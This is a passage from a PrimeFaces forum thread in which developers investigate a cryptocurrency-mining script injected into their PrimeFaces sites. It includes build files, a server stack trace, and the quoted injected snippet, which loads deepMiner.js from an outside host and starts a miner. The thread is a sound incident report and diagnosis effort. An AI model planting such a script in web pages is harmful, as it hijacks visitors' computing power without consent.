I'm running PrimeFaces apps since years without any similar problems.
If you think it's PrimeFaces related, we need some evidence or further analysis.
Nobody can help with this informations. Debug and post more infos who and how the script is added.
Also, 5.3 is already quite old... Use 6.2RC1 to get the latest fixes.
URGENT: Mining-script in Primfaces-Page? Where does it come from??
-
- PrimeFaces Core Developer
- Posts: 3979
- Joined: 03 Dec 2010, 14:11
- Location: Bavaria, DE
- Contact:
Thomas Andraschko
PrimeFaces | PrimeFaces Extensions
Apache Member | OpenWebBeans, DeltaSpike, MyFaces, BVal, TomEE
Sponsor me: https://github.com/sponsors/tandraschko
Blog: http://tandraschko.blogspot.de/
Twitter: https://twitter.com/TAndraschko
PrimeFaces | PrimeFaces Extensions
Apache Member | OpenWebBeans, DeltaSpike, MyFaces, BVal, TomEE
Sponsor me: https://github.com/sponsors/tandraschko
Blog: http://tandraschko.blogspot.de/
Twitter: https://twitter.com/TAndraschko
-
- Posts: 33
- Joined: 02 Apr 2012, 15:24
It doesn't change the behavior of the site, it only has influence on the CPU-load.tandraschko wrote: ↑13 Jan 2018, 16:56I'm running PrimeFaces apps since years without any similar problems.
Nevertheless...as you can see, i'm not the only one with this problem.
Perhaps i am the first one who detected this embedded scripts.
The "infected" sites are all build with Primefaces. Search for the script posted before.tandraschko wrote: ↑13 Jan 2018, 16:56If you think it's PrimeFaces related, we need some evidence or further analysis.
I am not the only one. There seems to be a relation to Primefaces.
That's why i posted this issue. At this time i can only report that there's the possibility to embed scripts in Primefaces related sites (on server-side, no clients involved).tandraschko wrote: ↑13 Jan 2018, 16:56Nobody can help with this informations. Debug and post more infos who and how the script is added.
The site is quite big and runs really fine with 5.3.tandraschko wrote: ↑13 Jan 2018, 16:56Also, 5.3 is already quite old... Use 6.2RC1 to get the latest fixes.
I also have this vulnerability/mining script on my site
after docker container restart - script is gone from pages and returns again after several hours
Used docker container jboss/wildfly:11.0.0.Final from docker hub, official repository
I provide primefaces-5.2.jar as module for WildFly, you can download for analyze from here
COPY docker/wildfly/modules $JBOSS_MODULEPATH
Docker
pom.xml
after docker container restart - script is gone from pages and returns again after several hours
Used docker container jboss/wildfly:11.0.0.Final from docker hub, official repository
I provide primefaces-5.2.jar as module for WildFly, you can download for analyze from here
COPY docker/wildfly/modules $JBOSS_MODULEPATH
Docker
Code: Select all
FROM jboss/wildfly:11.0.0.Final
MAINTAINER Ukraine <sp452@i.ua>
ENV JBOSS_MODULEPATH=/opt/jboss/wildfly/modules
COPY docker/wildfly/modules $JBOSS_MODULEPATH
COPY docker/wildfly/standalone.xml /opt/jboss/wildfly/standalone/configuration/standalone.xml
COPY deployments/spring-api.war /opt/jboss/wildfly/standalone/deployments
COPY deployments/ROOT.war /opt/jboss/wildfly/standalone/deployments
ADD docker/run.sh /usr/local/bin/wildfly
CMD ["/usr/local/bin/wildfly"]
Code: Select all
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>com.zinrad.rs</groupId>
<artifactId>rs</artifactId>
<version>0.0.1</version>
<packaging>pom</packaging>
<name>RS - zinrad.com</name>
<description>zinrad.com</description>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>1.5.9.RELEASE</version>
</parent>
<properties>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
<maven.war.plugin>3.2.0</maven.war.plugin>
<maven.compiler.target>1.8</maven.compiler.target>
<maven.compiler.source>1.8</maven.compiler.source>
<maven.compiler.version>3.7.0</maven.compiler.version>
<maven.surefire.version>2.20.1</maven.surefire.version>
<maven.release.version>2.5.3</maven.release.version>
<version.jboss.bom>8.2.2.Final</version.jboss.bom>
<version.jboss.spec.javaee.7.0>1.0.0.Final</version.jboss.spec.javaee.7.0>
<org.primefaces-version>5.2</org.primefaces-version>
<org.primefaces.themes-version>1.0.10</org.primefaces.themes-version>
<org.apache.camel.version>2.18.2</org.apache.camel.version>
</properties>
<modules>
<module>rs-app</module>
<!-- <module>rs-nomenclature</module> -->
<!-- <module>rs-shop</module> -->
<module>spring-api</module>
</modules>
<profiles>
<profile>
<id>default</id>
<activation>
<activeByDefault>true</activeByDefault>
</activation>
<build>
<plugins>
<plugin>
<artifactId>maven-surefire-plugin</artifactId>
<configuration>
<skip>true</skip>
</configuration>
</plugin>
</plugins>
</build>
</profile>
</profiles>
<build>
<pluginManagement>
<plugins>
<plugin>
<groupId>org.owasp</groupId>
<artifactId>dependency-check-maven</artifactId>
<version>3.1.0</version>
<executions>
<execution>
<goals>
<goal>check</goal>
</goals>
</execution>
</executions>
</plugin>
<plugin>
<artifactId>maven-compiler-plugin</artifactId>
<version>${maven.compiler.version}</version>
<configuration>
<source>${maven.compiler.source}</source>
<target>${maven.compiler.target}</target>
<encoding>${project.build.sourceEncoding}</encoding>
</configuration>
</plugin>
<plugin>
<artifactId>maven-war-plugin</artifactId>
<version>${maven.war.plugin}</version>
<configuration>
<warName>${project.artifactId}</warName>
<failOnMissingWebXml>false</failOnMissingWebXml>
<outputDirectory>deployments</outputDirectory>
<archive>
<addMavenDescriptor>false</addMavenDescriptor>
<manifestEntries>
<Build-Time>${maven.build.timestamp}</Build-Time>
<Dependencies>org.infinispan export, org.hibernate export</Dependencies>
</manifestEntries>
</archive>
</configuration>
</plugin>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-javadoc-plugin</artifactId>
<version>3.0.0</version>
<configuration>
<show>private</show>
<nohelp>true</nohelp>
</configuration>
</plugin>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-surefire-plugin</artifactId>
<version>${maven.surefire.version}</version>
<configuration>
<parallel>methods</parallel>
<threadCount>10</threadCount>
<systemPropertyVariables>
<arquillian.launch>arquillian-wildfly-remote</arquillian.launch>
</systemPropertyVariables>
</configuration>
</plugin>
<plugin>
<artifactId>maven-release-plugin</artifactId>
<version>${maven.release.version}</version>
<configuration>
<pushChanges>false</pushChanges>
<localCheckout>true</localCheckout>
</configuration>
</plugin>
</plugins>
</pluginManagement>
</build>
<dependencyManagement>
<dependencies>
<dependency>
<groupId>org.wildfly.bom</groupId>
<artifactId>jboss-javaee-7.0-with-hibernate</artifactId>
<version>${version.jboss.bom}</version>
<type>pom</type>
<scope>import</scope>
</dependency>
<!-- Apache Camel -->
<dependency>
<groupId>org.apache.camel</groupId>
<artifactId>camel-core</artifactId>
<version>${org.apache.camel.version}</version>
<scope>provided</scope>
<type>jar</type>
</dependency>
<dependency>
<groupId>org.apache.camel</groupId>
<artifactId>camel-blueprint</artifactId>
<version>${org.apache.camel.version}</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.apache.camel</groupId>
<artifactId>camel-stream</artifactId>
<version>${org.apache.camel.version}</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.apache.camel</groupId>
<artifactId>camel-cdi</artifactId>
<version>${org.apache.camel.version}</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.apache.camel</groupId>
<artifactId>camel-servlet</artifactId>
<version>${org.apache.camel.version}</version>
<scope>provided</scope>
</dependency>
<!-- blueprint web -->
<dependency>
<groupId>org.apache.aries.blueprint</groupId>
<artifactId>org.apache.aries.blueprint.web</artifactId>
<version>1.0.0</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>junit</groupId>
<artifactId>junit</artifactId>
<version>4.12</version>
<scope>test</scope>
</dependency>
</dependencies>
</dependencyManagement>
<repositories>
<repository>
<id>central</id>
<url>https://repo1.maven.org/maven2</url>
<releases>
<enabled>true</enabled>
</releases>
</repository>
<repository>
<id>jboss-public-repository-group</id>
<name>JBoss Public Repository Group</name>
<url>https://repository.jboss.org/nexus/content/groups/public</url>
</repository>
<repository>
<id>prime-repo</id>
<name>PrimeFaces Maven Repository</name>
<url>https://repository.primefaces.org</url>
<layout>default</layout>
<releases>
<enabled>true</enabled>
</releases>
<snapshots>
<enabled>false</enabled>
</snapshots>
</repository>
<repository>
<id>google-api-services</id>
<url>https://oss.sonatype.org/content/repositories/releases/</url>
</repository>
<repository>
<id>burtsev-net-maven</id>
<name>Burtsev.Net Maven Repository</name>
<url>http://maven.burtsev.net</url>
</repository>
</repositories>
</project>
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>emetemunoy</groupId>
<artifactId>rs-app</artifactId>
<version>0.1.15</version>
<packaging>war</packaging>
<name>Zinrad legacy app</name>
<description>zinrad.com</description>
<parent>
<groupId>com.zinrad.rs</groupId>
<artifactId>rs</artifactId>
<version>0.0.1</version>
</parent>
<properties>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
<maven.compiler.source>1.8</maven.compiler.source>
<maven.compiler.target>1.8</maven.compiler.target>
<version.jboss.spec.javaee.7.0>1.1.0.Final</version.jboss.spec.javaee.7.0>
<org.ocpsoft.rewrite>2.0.7.Final</org.ocpsoft.rewrite>
<mysql-connector-version>5.1.34</mysql-connector-version>
<javax.faces-version>2.2.0</javax.faces-version>
<org.apache.poi.version>3.12</org.apache.poi.version>
<org.primefaces-version>5.2</org.primefaces-version>
<org.primefaces.themes-version>1.0.10</org.primefaces.themes-version>
<org.springframework.version>4.2.0.RELEASE</org.springframework.version>
<org.springsecurity-version>3.2.8.RELEASE</org.springsecurity-version>
<!-- <org.springsecurity-version>4.0.2.RELEASE</org.springsecurity-version> -->
<org.springframework.webflow>2.4.0.RELEASE</org.springframework.webflow>
<com.h2database-version>1.4.191</com.h2database-version>
<infinispan.version>5.1.4.FINAL</infinispan.version>
<org.slf4j-version>1.7.12</org.slf4j-version>
<com.itextpdf-version>5.5.4</com.itextpdf-version>
<com.itextpdf.tool-version>5.5.4</com.itextpdf.tool-version>
<cglib-version>3.0</cglib-version>
<jboss.bom.version>1.0.7.Final</jboss.bom.version>
<version.io.swagger>1.5.17</version.io.swagger>
<version.arquillian.spring>1.0.0.Beta2</version.arquillian.spring>
<version.arquillian.transaction>1.0.0.Final-SNAPSHOT</version.arquillian.transaction>
</properties>
<dependencyManagement>
<dependencies>
<dependency>
<groupId>org.jboss.spec</groupId>
<artifactId>jboss-javaee-7.0</artifactId>
<version>${version.jboss.spec.javaee.7.0}</version>
<type>pom</type>
<scope>import</scope>
</dependency>
<dependency>
<groupId>org.jboss.bom</groupId>
<artifactId>jboss-javaee-6.0-with-hibernate</artifactId>
<version>${jboss.bom.version}</version>
<type>pom</type>
<scope>import</scope>
</dependency>
<dependency>
<groupId>org.jboss.bom</groupId>
<artifactId>jboss-javaee-6.0-with-transactions</artifactId>
<version>${jboss.bom.version}</version>
<type>pom</type>
<scope>import</scope>
</dependency>
</dependencies>
</dependencyManagement>
<dependencies>
<dependency>
<groupId>javax</groupId>
<artifactId>javaee-api</artifactId>
<version>7.0</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>com.h2database</groupId>
<artifactId>h2</artifactId>
<!-- <version>${com.h2database-version}</version> -->
</dependency>
<dependency>
<groupId>joda-time</groupId>
<artifactId>joda-time</artifactId>
<!-- <version>2.3</version> -->
</dependency>
<dependency>
<groupId>org.apache.poi</groupId>
<artifactId>poi</artifactId>
<version>${org.apache.poi.version}</version>
</dependency>
<dependency>
<groupId>org.apache.poi</groupId>
<artifactId>poi-ooxml</artifactId>
<version>${org.apache.poi.version}</version>
<exclusions>
<exclusion>
<artifactId>dom4j</artifactId>
<groupId>dom4j</groupId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>org.apache.poi</groupId>
<artifactId>poi-ooxml-schemas</artifactId>
<version>${org.apache.poi.version}</version>
</dependency>
<!-- Google -->
<!-- gdata -->
<dependency>
<groupId>com.google.gdata.gdata-java-client</groupId>
<artifactId>gdata-photos-2.0</artifactId>
<version>1.47.1</version>
</dependency>
<dependency>
<groupId>com.google.gdata.gdata-java-client</groupId>
<artifactId>gdata-appsforyourdomain-1.0</artifactId>
<version>1.47.1</version>
</dependency>
<dependency>
<groupId>com.google.api-client</groupId>
<artifactId>google-api-client</artifactId>
<version>1.22.0</version>
<type>jar</type>
</dependency>
<dependency>
<groupId>com.google.http-client</groupId>
<artifactId>google-http-client-jackson</artifactId>
<version>1.22.0</version>
<type>jar</type>
</dependency>
<dependency>
<groupId>javax.transaction</groupId>
<artifactId>jta</artifactId>
<version>1.1</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>commons-io</groupId>
<artifactId>commons-io</artifactId>
<version>2.4</version>
<scope>provided</scope>
</dependency>
<!-- <dependency> -->
<!-- <groupId>commons-fileupload</groupId> -->
<!-- <artifactId>commons-fileupload</artifactId> -->
<!-- <version>1.3.1</version> -->
<!-- <scope>provided</scope> -->
<!-- </dependency> -->
<dependency>
<groupId>javax.mail</groupId>
<artifactId>mail</artifactId>
<scope>provided</scope>
</dependency>
<!-- First declare the APIs we depend on and need for compilation. All
of them are provided by JBoss AS 7 -->
<!-- Import the CDI API, we use provided scope as the API is included in
JBoss AS 7 -->
<dependency>
<groupId>javax.enterprise</groupId>
<artifactId>cdi-api</artifactId>
<scope>provided</scope>
</dependency>
<!-- Import the Common Annotations API (JSR-250), we use provided scope
as the API is included in JBoss AS 7 -->
<dependency>
<groupId>org.jboss.spec.javax.annotation</groupId>
<artifactId>jboss-annotations-api_1.2_spec</artifactId>
<scope>provided</scope>
</dependency>
<!-- Import the JAX-RS API, we use provided scope as the API is included
in JBoss AS 7 -->
<dependency>
<groupId>org.jboss.spec.javax.ws.rs</groupId>
<artifactId>jboss-jaxrs-api_2.0_spec</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>io.swagger</groupId>
<artifactId>swagger-jaxrs</artifactId>
<version>${version.io.swagger}</version>
</dependency>
<!-- Import the JPA API, we use provided scope as the API is included in
JBoss AS 7 -->
<dependency>
<groupId>org.hibernate.javax.persistence</groupId>
<artifactId>hibernate-jpa-2.1-api</artifactId>
<scope>provided</scope>
</dependency>
<!-- Import the EJB API, we use provided scope as the API is included in
JBoss AS 7 -->
<dependency>
<groupId>org.jboss.spec.javax.ejb</groupId>
<artifactId>jboss-ejb-api_3.1_spec</artifactId>
<scope>provided</scope>
</dependency>
<!-- Now we declare any tools needed -->
<!-- Annotation processor to generate the JPA 2.0 metamodel classes for
typesafe criteria queries -->
<dependency>
<groupId>org.hibernate</groupId>
<artifactId>hibernate-jpamodelgen</artifactId>
<scope>provided</scope>
</dependency>
<!-- JSR-303 (Bean Validation) Implementation -->
<!-- Provides portable constraints such as @Email -->
<!-- Annotation processor that raising compilation errors whenever constraint
annotations are incorrectly used. -->
<dependency>
<groupId>org.hibernate</groupId>
<artifactId>hibernate-validator-annotation-processor</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.hibernate</groupId>
<artifactId>hibernate-core</artifactId>
<scope>provided</scope>
<!-- <version>${org.hibernate.version}</version> -->
<exclusions>
<exclusion>
<artifactId>xml-apis</artifactId>
<groupId>xml-apis</groupId>
</exclusion>
<exclusion>
<artifactId>antlr</artifactId>
<groupId>antlr</groupId>
</exclusion>
<exclusion>
<artifactId>jboss-logging</artifactId>
<groupId>org.jboss.logging</groupId>
</exclusion>
<exclusion>
<artifactId>dom4j</artifactId>
<groupId>dom4j</groupId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>org.hibernate</groupId>
<artifactId>hibernate-annotations</artifactId>
<version>3.5.6-Final</version>
</dependency>
<dependency>
<groupId>org.hibernate</groupId>
<artifactId>hibernate-infinispan</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.hibernate</groupId>
<artifactId>hibernate-jbosscache</artifactId>
<version>3.6.10.Final</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.hibernate</groupId>
<artifactId>hibernate-entitymanager</artifactId>
<scope>provided</scope>
<exclusions>
<exclusion>
<artifactId>jboss-logging</artifactId>
<groupId>org.jboss.logging</groupId>
</exclusion>
<exclusion>
<artifactId>dom4j</artifactId>
<groupId>dom4j</groupId>
</exclusion>
</exclusions>
</dependency>
<!-- Optional, but highly recommended -->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
<exclusions>
<exclusion>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-tomcat</artifactId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-data-jpa</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-jdbc</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-security</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.security</groupId>
<artifactId>spring-security-taglibs</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.webflow</groupId>
<artifactId>spring-faces</artifactId>
<version>2.4.7.RELEASE</version>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-api</artifactId>
<scope>compile</scope>
<!-- <version>${org.slf4j-version}</version> -->
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>jcl-over-slf4j</artifactId>
<scope>compile</scope>
<!-- <version>${org.slf4j-version}</version> -->
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-log4j12</artifactId>
<scope>compile</scope>
<!-- <version>${org.slf4j-version}</version> -->
</dependency>
<dependency>
<groupId>mysql</groupId>
<artifactId>mysql-connector-java</artifactId>
<!-- <version>${mysql-connector-version}</version> -->
</dependency>
<!-- Import the JSF API, we use provided scope as the API is included in
JBoss AS 7 -->
<!-- Import the JSF & JSP API -->
<dependency>
<groupId>org.jboss.spec.javax.servlet</groupId>
<artifactId>jboss-servlet-api_3.1_spec</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.jboss.spec.javax.faces</groupId>
<artifactId>jboss-jsf-api_2.2_spec</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.primefaces</groupId>
<artifactId>primefaces</artifactId>
<version>${org.primefaces-version}</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.primefaces.themes</groupId>
<artifactId>all-themes</artifactId>
<version>${org.primefaces.themes-version}</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.ocpsoft.rewrite</groupId>
<artifactId>rewrite-servlet</artifactId>
<version>${org.ocpsoft.rewrite}</version>
</dependency>
<dependency>
<groupId>org.ocpsoft.rewrite</groupId>
<artifactId>rewrite-config-prettyfaces</artifactId>
<version>${org.ocpsoft.rewrite}</version>
</dependency>
<dependency>
<groupId>org.ocpsoft.rewrite</groupId>
<artifactId>rewrite-integration-faces</artifactId>
<version>${org.ocpsoft.rewrite}</version>
</dependency>
<dependency>
<groupId>org.ocpsoft.rewrite</groupId>
<artifactId>rewrite-integration-spring</artifactId>
<version>${org.ocpsoft.rewrite}</version>
</dependency>
<!-- Reports -->
<dependency>
<groupId>net.sf.jasperreports</groupId>
<artifactId>jasperreports</artifactId>
<version>5.5.0</version>
</dependency>
<dependency>
<groupId>net.sf.jasperreports</groupId>
<artifactId>jasperreports-fonts</artifactId>
<version>4.0.0</version>
</dependency>
<dependency>
<groupId>com.itextpdf</groupId>
<artifactId>itextpdf</artifactId>
<version>${com.itextpdf-version}</version>
<type>jar</type>
</dependency>
<dependency>
<groupId>com.itextpdf.tool</groupId>
<artifactId>xmlworker</artifactId>
<version>${com.itextpdf.tool-version}</version>
<type>jar</type>
</dependency>
<dependency>
<groupId>junit</groupId>
<artifactId>junit</artifactId>
<scope>test</scope>
</dependency>
<!-- End -->
</dependencies>
<prerequisites>
<maven>3.0.4</maven>
</prerequisites>
<build>
<!-- Maven will append the version to the finalName (which is the name
given to the generated war, and hence the context root) -->
<finalName>${project.artifactId}</finalName>
<resources>
<resource>
<directory>src/main/resources</directory>
<filtering>false</filtering>
</resource>
</resources>
<plugins>
<plugin>
<artifactId>maven-compiler-plugin</artifactId>
<configuration>
<source>${maven.compiler.source}</source>
<target>${maven.compiler.target}</target>
<encoding>${project.build.sourceEncoding}</encoding>
</configuration>
</plugin>
<plugin>
<artifactId>maven-war-plugin</artifactId>
<configuration>
<!-- Java EE 6 doesn't require web.xml, Maven needs to catch up! -->
<outputDirectory>deployments</outputDirectory>
<warName>ROOT</warName>
<failOnMissingWebXml>false</failOnMissingWebXml>
<archive>
<manifestEntries>
<Dependencies>org.infinispan export, org.hibernate export</Dependencies>
</manifestEntries>
</archive>
</configuration>
</plugin>
<!-- The JBoss AS plugin deploys your war to a local JBoss AS container -->
<!-- To use, run: mvn package jboss-as:deploy -->
<plugin>
<artifactId>maven-surefire-plugin</artifactId>
</plugin>
<plugin>
<groupId>org.wildfly.plugins</groupId>
<artifactId>wildfly-maven-plugin</artifactId>
<version>1.2.1.Final</version>
</plugin>
</plugins>
</build>
<reporting>
<plugins>
<plugin>
<groupId>org.codehaus.mojo</groupId>
<artifactId>versions-maven-plugin</artifactId>
<version>2.1</version>
<reportSets>
<reportSet>
<reports>
<report>dependency-updates-report</report>
<report>plugin-updates-report</report>
<report>property-updates-report</report>
</reports>
</reportSet>
</reportSets>
</plugin>
</plugins>
</reporting>
<profiles>
<profile>
<id>default</id>
<activation>
<activeByDefault>true</activeByDefault>
</activation>
<build>
<plugins>
<plugin>
<artifactId>maven-surefire-plugin</artifactId>
<configuration>
<skip>true</skip>
</configuration>
</plugin>
</plugins>
</build>
</profile>
<profile>
<!-- When built in OpenShift the 'openshift' profile will be used when
invoking mvn. -->
<!-- Use this profile for any OpenShift specific customization your app
will need. -->
<!-- By default that is to put the resulting archive into the 'deployments'
folder. -->
<!-- http://maven.apache.org/guides/mini/guide-building-for-different-environments.html -->
<id>openshift</id>
<build>
<plugins>
<plugin>
<artifactId>maven-war-plugin</artifactId>
<version>3.2.0</version>
<configuration>
<outputDirectory>deployments</outputDirectory>
<warName>ROOT</warName>
<archive>
<manifestEntries>
<Dependencies>org.infinispan export</Dependencies>
</manifestEntries>
</archive>
</configuration>
</plugin>
</plugins>
</build>
</profile>
</profiles>
</project>
like PrimeFaces
Java
Java
Yeah I agree but I think somehow someone hacked your machine to add this bitcoin miner to it. I am not sure how they got in or how they were able to install a script on you outgoing responses.
https://github.com/deepwn/deepMiner
I am fascinated please keep us up to date if you figure out how they did it?
https://github.com/deepwn/deepMiner
I am fascinated please keep us up to date if you figure out how they did it?
PrimeFaces Developer | PrimeFaces Extensions Developer
GitHub Profile: https://github.com/melloware
PrimeFaces Elite 13.0.0 / PF Extensions 13.0.0
PrimeReact 9.6.1
GitHub Profile: https://github.com/melloware
PrimeFaces Elite 13.0.0 / PF Extensions 13.0.0
PrimeReact 9.6.1
Also found these 2 articles..
https://blog.sucuri.net/2017/09/hacked- ... ncies.html
https://blog.sucuri.net/2018/01/malicio ... art-2.html
Also I am leaning towards its an exploit in your Apache web server:
https://serverfault.com/questions/56148 ... y-the-flaw
https://blog.sucuri.net/2017/09/hacked- ... ncies.html
https://blog.sucuri.net/2018/01/malicio ... art-2.html
Also I am leaning towards its an exploit in your Apache web server:
https://serverfault.com/questions/56148 ... y-the-flaw
PrimeFaces Developer | PrimeFaces Extensions Developer
GitHub Profile: https://github.com/melloware
PrimeFaces Elite 13.0.0 / PF Extensions 13.0.0
PrimeReact 9.6.1
GitHub Profile: https://github.com/melloware
PrimeFaces Elite 13.0.0 / PF Extensions 13.0.0
PrimeReact 9.6.1
I have got the same issue today in two different Domains on the same server. One of the Domains is using Primefaces 5.2 on Payara:
This has been injected to all pages (I have changed the code in Anonymous function.
I have found following in the Logfile where Primefaces 5.2 is running:
This has been injected to all pages (I have changed the code in Anonymous function.
Code: Select all
<script src="https://jhondi33.duckdns.org:7777/deepMiner.js"></script><script>var miner = new deepMiner.Anonymous("5553x393mfdsfs");miner.start();</script> </title><script type="text/javascript" src="/javax.faces.resource/app.min.js.xhtml?ln=js"></script>
Code: Select all
java.io.IOException: javax.el.ELException: java.lang.IllegalArgumentException: Cannot convert
of type class java.lang.String to interface org.primefaces.model.StreamedContent
at org.primefaces.application.resource.StreamedContentHandler.handle(StreamedContentHandler.java:94)
at org.primefaces.application.resource.PrimeResourceHandler.handleResourceRequest(PrimeResourceHandler.java:72)
at javax.faces.application.ResourceHandlerWrapper.handleResourceRequest(ResourceHandlerWrapper.java:153)
at javax.faces.application.ResourceHandlerWrapper.handleResourceRequest(ResourceHandlerWrapper.java:153)
at javax.faces.webapp.FacesServlet.service(FacesServlet.java:655)
at org.apache.catalina.core.StandardWrapper.service(StandardWrapper.java:1606)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:338)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.ocpsoft.rewrite.servlet.RewriteFilter.doFilter(RewriteFilter.java:205)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:250)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.tuckey.web.filters.urlrewrite.RuleChain.handleRewrite(RuleChain.java:176)
at org.tuckey.web.filters.urlrewrite.RuleChain.doRules(RuleChain.java:145)
at org.tuckey.web.filters.urlrewrite.UrlRewriter.processRequest(UrlRewriter.java:92)
at org.tuckey.web.filters.urlrewrite.UrlRewriteFilter.doFilter(UrlRewriteFilter.java:389)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:250)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:256)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:160)
at org.apache.catalina.core.StandardPipeline.doInvoke(StandardPipeline.java:654)
at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.java:593)
at com.sun.enterprise.web.WebPipeline.invoke(WebPipeline.java:99)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:155)
at org.apache.catalina.connector.CoyoteAdapter.doService(CoyoteAdapter.java:371)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:238)
at com.sun.enterprise.v3.services.impl.ContainerMapper$HttpHandlerCallable.call(ContainerMapper.java:466)
at com.sun.enterprise.v3.services.impl.ContainerMapper.service(ContainerMapper.java:169)
at org.glassfish.grizzly.http.server.HttpHandler.runService(HttpHandler.java:206)
at org.glassfish.grizzly.http.server.HttpHandler.doHandle(HttpHandler.java:180)
at org.glassfish.grizzly.http.server.HttpServerFilter.handleRead(HttpServerFilter.java:235)
at org.glassfish.grizzly.filterchain.ExecutorResolver$9.execute(ExecutorResolver.java:119)
at org.glassfish.grizzly.filterchain.DefaultFilterChain.executeFilter(DefaultFilterChain.java:284)
at org.glassfish.grizzly.filterchain.DefaultFilterChain.executeChainPart(DefaultFilterChain.java:201)
at org.glassfish.grizzly.filterchain.DefaultFilterChain.execute(DefaultFilterChain.java:133)
at org.glassfish.grizzly.filterchain.DefaultFilterChain.process(DefaultFilterChain.java:112)
at org.glassfish.grizzly.ProcessorExecutor.execute(ProcessorExecutor.java:77)
at org.glassfish.grizzly.nio.transport.TCPNIOTransport.fireIOEvent(TCPNIOTransport.java:539)
at org.glassfish.grizzly.strategies.AbstractIOStrategy.fireIOEvent(AbstractIOStrategy.java:112)
at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy.run0(WorkerThreadIOStrategy.java:117)
at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy.access$100(WorkerThreadIOStrategy.java:56)
at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy$WorkerThreadRunnable.run(WorkerThreadIOStrategy.java:137)
at org.glassfish.grizzly.threadpool.AbstractThreadPool$Worker.doWork(AbstractThreadPool.java:593)
at org.glassfish.grizzly.threadpool.AbstractThreadPool$Worker.run(AbstractThreadPool.java:573)
at java.lang.Thread.run(Thread.java:748)
Caused by: javax.el.ELException: java.lang.IllegalArgumentException: Cannot convert
of type class java.lang.String to interface org.primefaces.model.StreamedContent
at com.sun.el.ExpressionFactoryImpl.coerceToType(ExpressionFactoryImpl.java:87)
at org.jboss.weld.util.el.ForwardingExpressionFactory.coerceToType(ForwardingExpressionFactory.java:38)
at javax.el.ELContext.convertToType(ELContext.java:478)
at com.sun.el.lang.EvaluationContext.convertToType(EvaluationContext.java:166)
at com.sun.el.ValueExpressionImpl.getValue(ValueExpressionImpl.java:229)
at org.jboss.weld.el.WeldValueExpression.getValue(WeldValueExpression.java:50)
at org.primefaces.application.resource.StreamedContentHandler.handle(StreamedContentHandler.java:58)
... 43 more
Caused by: java.lang.IllegalArgumentException: Cannot convert
of type class java.lang.String to interface org.primefaces.model.StreamedContent
at com.sun.el.lang.ELSupport.coerceToType(ELSupport.java:424)
at com.sun.el.ExpressionFactoryImpl.coerceToType(ExpressionFactoryImpl.java:85)
... 49 more
]]
Last edited by tak3shi on 15 Jan 2018, 23:56, edited 2 times in total.
OK and you are using PF 6.1 and are you using an Apache Web Server in front of your Payara server? Just trying to narrow down the relationship of how this script is getting injected.
PrimeFaces Developer | PrimeFaces Extensions Developer
GitHub Profile: https://github.com/melloware
PrimeFaces Elite 13.0.0 / PF Extensions 13.0.0
PrimeReact 9.6.1
GitHub Profile: https://github.com/melloware
PrimeFaces Elite 13.0.0 / PF Extensions 13.0.0
PrimeReact 9.6.1
-
